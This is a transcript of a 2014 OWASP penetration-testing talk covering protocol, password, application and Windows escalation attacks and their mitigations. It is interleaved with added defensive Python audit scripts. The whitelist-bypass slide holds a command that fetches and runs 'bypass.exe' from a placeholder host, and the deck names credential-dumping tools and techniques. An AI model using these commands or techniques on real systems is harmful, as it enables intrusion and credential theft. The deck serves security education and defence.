attack all the layers: what's working during pentests (owasp nyc)

Posted on 24-May-2015


DESCRIPTION

This presentation is intended to provide an overview of vulnerabilities and attack techniques that are popular in penetration testing at the moment. Vulnerabilities related to the application, network, and server layers will be covered along with current anti-virus bypass and privilege escalation techniques used by attackers and penetration testers. This presentation should be interesting to security professionals and system administrators looking for more insight into real world attacks. This is the version modified for the OWASP meeting in June of 2014.

TRANSCRIPT

Attack All the Layers: What’s Working During Pen Tests

Scott Sutherland and Karl Fosaaen

Introductions

• Scott Sutherland

‒ Principal Security Consultant @ NetSPI

‒ Twitter: @_nullbind

• Karl Fosaaen

‒ Senior Security Consultant @ NetSPI

‒ Twitter: @kfosaaen

We specialize in both things and stuff!

Overview

• Why do Companies Pen Test?

• Attacking Protocols

• Attacking Passwords

• Attacking Applications

• Bypassing End Point Protection

• Windows Escalation

• Conclusions

Why do companies pen test?

• Compliance requirements

• Evaluate risks associated with an acquisition or partnership

• Validate preventative controls

• Validate detective controls

• Prioritize internal security initiatives

• Proactively prevent breaches

Overview

• Attacking Protocols

• Attacking Passwords

• Attacking Applications

• Bypassing End Point Protection

• Windows Escalation

Attacking protocols

• ARP: Address Resolution Protocol

• NBNS: NetBIOS Name Service

• SMB: Server Message Block

• PXE: Preboot Execution Environment

• DTP: Dynamic Trunking Protocol

Attacking protocols: ARP

Address Resolution Protocol

Attacking protocols: ARP

• General

‒ MAC to IP association

‒ Layer 2

• Conditions

‒ Independent of user action

‒ Broadcast network

• Attacks

‒ MITM Monitoring

‒ MITM Injection

‒ DOS

Attacking protocols: ARP

• Common mitigating controls:

‒ Dynamic ARP Inspection

‒ Port Security

‒ Static Routes (not recommended)

Attacking protocols: NBNS / LLMNR

NetBIOS Name Service

Attacking protocols: NBNS

• General

‒ IP to hostname association

‒ Layer 5 / 7

• Constraints

‒ Dependent on user action

‒ Broadcast Network

‒ Windows Only

• Attacks

‒ MITM Monitoring

‒ MITM Injection

‒ DOS

Attacking protocols: NBNS

• Common mitigating controls:

‒ Create a WPAD (Web Proxy Auto-Discovery) server entry in DNS

‒ Disable NBNS (recommended)

  • Might cause issues with legacy apps

‒ Disable insecure authentication to help limit the impact of exposed hashes

‒ Enable packet signing to help prevent SMB Relay attacks
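One way to validate the NBNS mitigations above is to look for anything on the segment that answers name queries for a host that does not exist, which is exactly what a poisoner does. This is an added example, not code from the slides or from NetSPI; the name NOSUCHHOST99 and the 192.0.2.10 address in the constructed sample reply are assumptions.

```python
import random
import socket
import struct

def encode_netbios_name(name, suffix=0x00):
    """First-level encoding: pad to 15 chars, add the suffix byte, write each nibble as 'A' + nibble."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    half = bytes(ord("A") + n for b in raw for n in (b >> 4, b & 0x0F))
    return b"\x20" + half + b"\x00"  # length byte (32), encoded name, NUL terminator

def build_name_query(name, txid):
    """NBNS name query; flags 0x0110 = query, recursion desired, broadcast."""
    header = struct.pack(">HHHHHH", txid, 0x0110, 1, 0, 0, 0)
    return header + encode_netbios_name(name) + struct.pack(">HH", 0x0020, 0x0001)  # type NB, class IN

def parse_name_response(data, txid):
    """Return the IPv4 address carried in a positive NB answer for txid, else None."""
    if len(data) < 12:
        return None
    rid, flags, qd, an, _, _ = struct.unpack(">HHHHHH", data[:12])
    if rid != txid or not (flags & 0x8000) or an == 0:
        return None
    off = 12
    for _ in range(qd):  # skip echoed questions: name, type, class
        off += 1 + data[off] + 1 + 4
    off += 2 if (data[off] & 0xC0) == 0xC0 else 1 + data[off] + 1  # pointer or full name
    rtype, _, _, rdlen = struct.unpack(">HHIH", data[off:off + 10])
    off += 10
    if rtype != 0x0020 or rdlen < 6 or len(data) < off + 6:
        return None
    return socket.inet_ntoa(data[off + 2:off + 6])  # RDATA = NB_FLAGS (2) + IP (4)

def build_sample_response(txid, ip, name="NOSUCHHOST99"):
    """Constructed positive answer (flags 0x8500, no question section), used for offline testing."""
    header = struct.pack(">HHHHHH", txid, 0x8500, 0, 1, 0, 0)
    rr = encode_netbios_name(name) + struct.pack(">HHIH", 0x0020, 0x0001, 165, 6)
    return header + rr + b"\x00\x00" + socket.inet_aton(ip)

def probe_for_poisoner(timeout=2.0, name="NOSUCHHOST99"):
    """Broadcast a query for a name nobody owns; any reply identifies a host answering for it."""
    txid = random.randint(0, 0xFFFF)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        sock.settimeout(timeout)
        sock.sendto(build_name_query(name, txid), ("255.255.255.255", 137))
        try:
            data, (src, _) = sock.recvfrom(1024)
        except socket.timeout:
            return None
    return parse_name_response(data, txid) or src
```

Run probe_for_poisoner() from a workstation on the segment; a non-None result means something answered for a name that should get no reply.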

Attacking protocols: SMB

Server Message Block

Attacking protocols: SMB

• General

‒ SMB is the comeback kid!

‒ Layer 7

• Constraints

‒ Dependent on user action

‒ Any routable network

‒ No connecting back to originating host

• Attacks

‒ Command execution

‒ Shells... aaand shells

Attacking protocols: SMB

• Historically, SMB Relay has been used to:

‒ Execute arbitrary commands

‒ Obtain shells

• Lately the community has been developing tools for doing things like:

‒ LDAP queries

‒ SQL queries

‒ Exchange services

‒ Mounting file systems

Attacking protocols: SMB

• Common mitigating controls:

‒ Enable packet signing to help prevent SMB Relay attacks

‒ Apply really old patches, as if you missed out on the last decade…

Attacking protocols: PXE

Preboot eXecution Environment

Attacking protocols: PXE

• General

‒ DHCP

• Constraints

‒ Broadcast domain

• Attacks

‒ Command execution

‒ Access to file system/images

Attacking protocols: PXE

• Common mitigating controls:

‒ Isolate networks

‒ Add device validation

Attacking protocols: DTP

Dynamic Trunking Protocol

Attacking protocols: DTP

• General

‒ 802.1Q encapsulation is in use

‒ Layer 2

• Constraints

‒ Independent of user action

‒ Trunking is set to enabled or auto on switch port

• Attacks

‒ Monitor network traffic for all VLANs, because all VLANs are allowed on a trunk by default

‒ *Full VLAN hopping

Attacking protocols: DTP

• Common mitigating controls:

‒ Use dedicated VLAN ID for all trunking ports

‒ Disable all unused ports and place them on a non-routable VLAN

‒ Configure all user ports as access ports to prevent trunk negotiation

‒ Configure frames with two 802.1Q headers

‒ Configure strong VACLs

Overview

• Attacking Protocols

• Attacking Passwords

• Attacking Applications

• Bypassing End Point Protection

• Windows Escalation

Attacking passwords

• Hashes and Cracking (Offline)

• Dictionary Attacks (Online)

• Dump in Cleartext!

Attacking Passwords

Tool                Function                    Year

Pass the Hash       Passing Hashes              1997

Rainbow Tables      Password Cracking           2000s

SMB Relay           Relaying Captured Hashes    2001

John the Ripper     Password Cracking           2001

NetNTLM.pl          Cracking Network Hashes     2007

PTH Toolkit         Pass all the Hashes         2008

Hashcat             CPU and GPU Cracking        2010

WCE and Mimikatz    Cleartext Windows Creds     2012

Attacking Passwords: Hashes

• What are hashes?

‒ A non-reversible way of storing passwords

‒ Operating systems and applications

‒ Lots of types

• LM/NTLM

• Network and Local

• MD5

• SHA

• descrypt

Attacking Passwords: Hashes

• How do we get hashes?

‒ Cain and Abel

‒ fgdump

‒ Metasploit

‒ Mimikatz

‒ Databases

‒ Config files

Attacking Passwords: Cracking

• Cracking Hashes

‒ Rainbow Tables

‒ John the Ripper

‒ oclHashcat

‒ CPU versus GPU

Attacking Passwords: Cracking

[Chart: Minutes for Six Character Brute Force, CPU versus GPU; y-axis 0 to 600 minutes]

Attacking Passwords: Cracking

[Image slide: GPU versus CPU]

Attacking Passwords: Passing Hashes

• Passing Hashes

‒ Metasploit

‒ psexec

‒ winexec

‒ PTH toolkit

Attacking Passwords: Dictionary

• Online Vs. Offline Attacks

• Dictionary Attacks

‒ Enumerate users

• Null SMB logins, RPC, *SID BF, SNMP, LDAP, SharePoint, etc.

‒ Attack!

• Are users getting smarter?

‒ Sort of…

  • “Summer2014” meets password complexity requirements
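The “Summer2014” point is that the AD complexity rule and actual guessability are different tests. The check below, added here and not part of the talk, mirrors the three-of-four character class rule and then separately flags season-or-month-plus-year passwords and passwords containing the account name; the minimum length of 8 is an assumed policy value.

```python
import re

MIN_LENGTH = 8  # assumed policy minimum; the check is about pattern, not length
SEASONS_MONTHS = ("spring", "summer", "fall", "autumn", "winter",
                  "january", "february", "march", "april", "may", "june", "july",
                  "august", "september", "october", "november", "december")
# Season or month name, optional separator, two- or four-digit year, up to three trailing symbols.
# Leetspeak variants (Summ3r2014) are deliberately not normalised here.
SEASON_YEAR = re.compile(r"^(?:" + "|".join(SEASONS_MONTHS) + r")[-_.]?(?:19|20)?\d{2}[!@#$%^&*.?]{0,3}$",
                         re.IGNORECASE)

def contains_username(password, username):
    """AD rejects passwords containing the sAMAccountName when it is three or more characters long."""
    return len(username) >= 3 and username.lower() in password.lower()

def meets_windows_complexity(password, username=""):
    """Approximation of the 'password must meet complexity requirements' policy:
    minimum length, no account-name fragment, and at least three of four character classes."""
    if len(password) < MIN_LENGTH or contains_username(password, username):
        return False
    classes = (r"[A-Z]", r"[a-z]", r"\d", r"[^A-Za-z0-9]")
    return sum(1 for c in classes if re.search(c, password)) >= 3

def is_predictable(password, username=""):
    """True for the patterns a dictionary attack tries first, regardless of the complexity verdict."""
    return bool(SEASON_YEAR.match(password)) or contains_username(password, username)

def evaluate(password, username=""):
    """Return both verdicts so a reviewer can see 'complex but predictable' in one place."""
    return {"complex": meets_windows_complexity(password, username),
            "predictable": is_predictable(password, username)}
```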

Attacking Passwords: Cleartext

• Common application configs

• Reversible Formats

‒ Find in files

‒ Groups.xml

‒ Unattend.xml

‒ Registry

• WCE

• Mimikatz
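Groups.xml is on the list because Group Policy Preferences store account passwords in a cpassword attribute that anyone who can read SYSVOL can recover. The audit below is an added example, not code from the talk or from NetSPI: it flags every GPP file still carrying a non-empty cpassword. The sample XML is constructed and its cpassword value is a placeholder; the scan_sysvol path argument is whatever SYSVOL copy you point it at.

```python
import os
import xml.etree.ElementTree as ET

# Group Policy Preferences files that can carry a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
ACCOUNT_ATTRS = ("username", "runas", "accountname")  # attribute names used across those files

# Constructed sample Groups.xml; the cpassword value is a placeholder, not a real encrypted blob.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="localadmin" changed="2014-01-15 10:22:01">
    <Properties action="U" cpassword="PLACEHOLDER_CPASSWORD_VALUE" changeLogon="0"
                noChange="1" neverExpires="1" acctDisabled="0" userName="localadmin"/>
  </User>
  <User name="svc_backup" changed="2014-02-01 09:00:00">
    <Properties action="C" cpassword="" userName="svc_backup"/>
  </User>
</Groups>
"""

def find_cpassword_entries(xml_text):
    """Return the account name of every Properties element with a non-empty cpassword."""
    hits = []
    for props in ET.fromstring(xml_text).iter("Properties"):
        if not props.get("cpassword"):  # "" means the preference stores no password
            continue
        account = next((v for k, v in props.attrib.items() if k.lower() in ACCOUNT_ATTRS), "<unknown>")
        hits.append(account)
    return hits

def scan_sysvol(sysvol_dir):
    """Walk a SYSVOL tree (or an offline copy) and list (path, account) for every stored cpassword."""
    findings = []
    for root, _, files in os.walk(sysvol_dir):
        for fname in files:
            if fname not in GPP_FILES:
                continue
            path = os.path.join(root, fname)
            try:
                with open(path, encoding="utf-8-sig") as fh:  # GPP XML is often written with a BOM
                    accounts = find_cpassword_entries(fh.read())
            except (OSError, ET.ParseError):
                continue
            findings.extend((path, a) for a in accounts)
    return findings
```

Any finding means the password should be rotated and the preference item removed, not just the file cleaned up.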

Overview

• Attacking Protocols

• Attacking Passwords

• Attacking Applications

• Bypassing End Point Protection

• Windows Escalation

Attacking Applications: Common

• Default and weak passwords

• SQL injection

• RFI/web shells

• Web directory traversals

• UNC path injection + SMB relay

• Critical missing patches

Attacking Applications: Breakouts

• Obtain a common dialog box

• Bypass folder path and file type restrictions

• Bypass file execution restrictions

• Bypass file black/white lists

• Access to native consoles and management tools

• Download and use third party applications

Overview

• Attacking Protocols

• Attacking Passwords

• Attacking Applications

• Bypassing End Point Protection

• Windows Escalation

Bypassing EPP: Anti-virus

• PowerShell code Injection

• Execute off network share

• Clone resource tables

• Modify import tables

• Pack files

Bypassing EPP: App White List

• Execution via approved apps

‒ Powershell Code Injection

‒ Rundll32 mydll,DLLMain@12

‒ IEExec http://x.x.x.x:8080/bypass.exe

• Exceptions

‒ File name

‒ Publisher

‒ Directory

• Excessive privileges

‒ Services and policy

Overview

• Attacking Protocols

• Attacking Passwords

• Attacking Applications

• Bypassing End Point Protection

• Windows Escalation

Windows Escalation: Overview

• Privilege Escalation Goals

• Local Privilege Escalation

• Domain Privilege Escalation

Windows Escalation: Goals

• Local Escalation Goals

‒ Find clear text or reversible credentials with local administrative privileges

‒ Get application to run commands as Administrator or LocalSystem

• Domain Escalation Goals

‒ Find Domain Admins

‒ Impersonate Domain Admins

Windows Escalation: Local

• Local Escalation

‒ *Clear text credentials in files, registry, over network

‒ Insecure service paths

‒ DLL preloading

‒ DLL and exe replacement

‒ Binary planting in auto-run locations (reg and file system)

‒ Modifying scheduled tasks

‒ *Local and remote exploits

‒ Leverage local applications like IIS, SQL Server, etc.

‒ *UNC path injection + SMB Relay / Capture + crack
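The “insecure service paths” item is usually an unquoted ImagePath with spaces in it: Windows resolves the path cut at each space before the real one, so whoever can write to those directories controls what the service runs. The audit below is an added example, not code from the talk; the service entries are constructed, and on a real host you would feed it the ImagePath values read from HKLM\SYSTEM\CurrentControlSet\Services.

```python
import ntpath
import re

# Constructed sample of service ImagePath values (not taken from any real host).
SAMPLE_SERVICES = {
    "BackupAgent": r"C:\Program Files\Acme Backup\agent.exe -service",
    "Spooler": r"%SystemRoot%\System32\spoolsv.exe",
    "MonitorSvc": r'"C:\Program Files\Monitor Tools\monsvc.exe" /run',
    "LegacyDb": r"C:\LegacyDb\dbsrv.exe",
}

def split_image_path(image_path):
    """Split an unquoted ImagePath into (executable, arguments); the executable ends at the first '.exe'."""
    m = re.match(r"(.*?\.exe)(\s.*)?$", image_path.strip(), re.IGNORECASE)
    if not m:
        return image_path.strip(), ""
    return m.group(1), (m.group(2) or "").strip()

def is_unquoted_with_spaces(image_path):
    """True when the path is not quoted and the executable's path contains a space."""
    p = image_path.strip()
    if p.startswith('"'):
        return False
    exe, _ = split_image_path(p)
    return " " in exe

def directories_to_check(exe_path):
    r"""Directories whose write ACLs decide whether the ambiguity matters: for
    C:\Program Files\Acme Backup\agent.exe the service control manager looks for
    C:\Program.exe and C:\Program Files\Acme.exe before the intended binary."""
    parts = exe_path.split(" ")
    return [ntpath.dirname(" ".join(parts[:i]) + ".exe") for i in range(1, len(parts))]

def quoted_fix(image_path):
    """The corrected ImagePath: executable in double quotes, arguments unchanged."""
    exe, args = split_image_path(image_path)
    return f'"{exe}" {args}'.strip()

def audit(services):
    """Map each affected service name to (directories to check, corrected ImagePath)."""
    return {name: (directories_to_check(split_image_path(path)[0]), quoted_fix(path))
            for name, path in services.items() if is_unquoted_with_spaces(path)}
```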

Windows Escalation: Domain

• Domain Escalation – Find DAs

‒ Check locally! (Processes, Tokens, Cachedump)

‒ Review active sessions – netsess (veil)

‒ Review remote processes - tasklist

‒ Service Principal Names (SPN) – get-spn

‒ Scanning Remote Systems for NetBIOS Information - nbtscan

‒ Pass the hash to other systems

‒ PowerShell shell spraying

‒ WINRM/WINRS shell spraying

‒ Psexec shell spraying

Windows Escalation: Domain

• Domain Escalation – Impersonate DAs

‒ Dump passwords from memory with Mimikatz

‒ Migrate into the Domain Admin’s process

‒ Steal Domain Admins delegation tokens with Incognito

‒ Dump cached domain admin hashes with cachedump

‒ Relatively new techniques

• PTH using Kerberos ticket

Conclusions

• Most Networks

‒ Kind of broken

• Most Protocols

‒ Kind of broken

• Most Applications

‒ Kind of broken

All can kind of be fixed

Attack all the layers!

• Any questions?
